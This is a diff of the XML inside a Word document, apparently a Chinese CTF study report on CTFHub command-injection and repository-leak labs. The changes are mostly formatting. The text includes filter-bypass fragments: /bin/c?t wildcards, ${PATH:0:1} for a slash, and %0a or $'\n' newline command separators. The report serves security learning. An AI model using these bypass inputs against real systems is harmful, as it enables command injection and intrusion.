-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`exec` 空白</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> = 输出走了 stderr</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>教训：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>加 `2&gt;&amp;1` 看错误</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>18</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>坑：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>c?t</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 命令不存在</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">教训：通配符只在"所在目录"匹配，必须写 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>/bin/c?t</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>19</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>坑：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>cat flag_is_here/</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 空白</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>教训：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>cat</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 的是目录 → </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>Is a directory</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>20</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>坑：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>curl 吃掉 `${PATH:0:1}` 的花括号</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>教训：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>URL globbing！加 `-g`</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>21</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>坑：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>--data-urlencode</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 把 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>%0a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 再编码</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">教训：用 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>$'\n'</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 发真换行</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>22</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve">坑：表单框里填 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>%0a</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 无效</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>教训：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>&lt;input&gt;</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 单行 + </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>%</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> 会被编码成 </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
-          <w:color w:val="C7254E"/>
-          <w:sz w:val="20"/>
-        </w:rPr>
-        <w:t>%25</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>23</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>坑：页面看不到 flag 但 Response 有</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListBullet2"/>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>教训：</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`&lt;?php` 在 HTML 里是"伪注释"，会被吃</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> → 用 </w:t>
+        <w:t>&lt;?php</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 在 HTML 里是"伪注释"，会被吃 → 用 </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17073,7 +16676,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>套路 A：版本库泄露 = "探测 → 清单 → 取内容 → 解码"</w:t>
@@ -17086,7 +16688,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:sz w:val="21"/>
         </w:rPr>
         <w:t>套路 B：命令注入 = "找输入点 → 确认拼接 → 加分隔符 → 绕过滤"</w:t>
@@ -17113,18 +16714,33 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`strpos` 返回 `0` 是 falsy</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> —— </w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>strpos</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 返回 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>0</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 是 falsy —— </w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17148,18 +16764,18 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`exec` 只收 stdout</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> —— 空白 ≠ 没执行，可能只是报错走了 stderr</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>exec</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 只收 stdout —— 空白 ≠ 没执行，可能只是报错走了 stderr</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17168,18 +16784,18 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`&lt;?php` 在 HTML 里是注释开头</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> —— 浏览器渲染会吞掉，Response 才是真相</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>&lt;?php</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 在 HTML 里是注释开头 —— 浏览器渲染会吞掉，Response 才是真相</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17205,7 +16821,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:i/>
           <w:color w:val="555555"/>
           <w:sz w:val="20"/>
@@ -17227,7 +16842,6 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
           <w:i/>
           <w:color w:val="555555"/>
           <w:sz w:val="20"/>
@@ -17730,11 +17344,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`notes/17-信息泄露漏洞.md`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>notes/17-信息泄露漏洞.md</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17750,11 +17364,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`notes/18-做题常见疑问.md`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>notes/18-做题常见疑问.md</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17770,11 +17384,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`notes/20-信息泄露作业答案.md`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>notes/20-信息泄露作业答案.md</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17790,11 +17404,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`notes/21-PHP命令执行与绕过.md`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>notes/21-PHP命令执行与绕过.md</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17810,11 +17424,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`writeups/靶场/CTFHub-GitStash.md`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>writeups/靶场/CTFHub-GitStash.md</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17830,11 +17444,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`writeups/靶场/CTFHub-基础认证.md`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>writeups/靶场/CTFHub-基础认证.md</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17850,11 +17464,11 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>`logs/2026-10-17.md`</w:t>
+          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:eastAsia="Consolas"/>
+          <w:color w:val="C7254E"/>
+          <w:sz w:val="20"/>
+        </w:rPr>
+        <w:t>logs/2026-10-17.md</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -17878,17 +17492,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>报告完成日期</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：2026-10-21</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>报告完成日期：2026-10-21</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17898,17 +17504,9 @@
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:b/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>环境</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="微软雅黑" w:hAnsi="微软雅黑" w:eastAsia="微软雅黑"/>
-          <w:sz w:val="21"/>
-        </w:rPr>
-        <w:t>：WSL2 + Kali Rolling / PHP 8.4.24（本地实测）/ PHP 5.6.40（靶场）</w:t>
+          <w:sz w:val="21"/>
+        </w:rPr>
+        <w:t>环境：WSL2 + Kali Rolling / PHP 8.4.24（本地实测）/ PHP 5.6.40（靶场）</w:t>
       </w:r>
     </w:p>
     <w:sectPr>
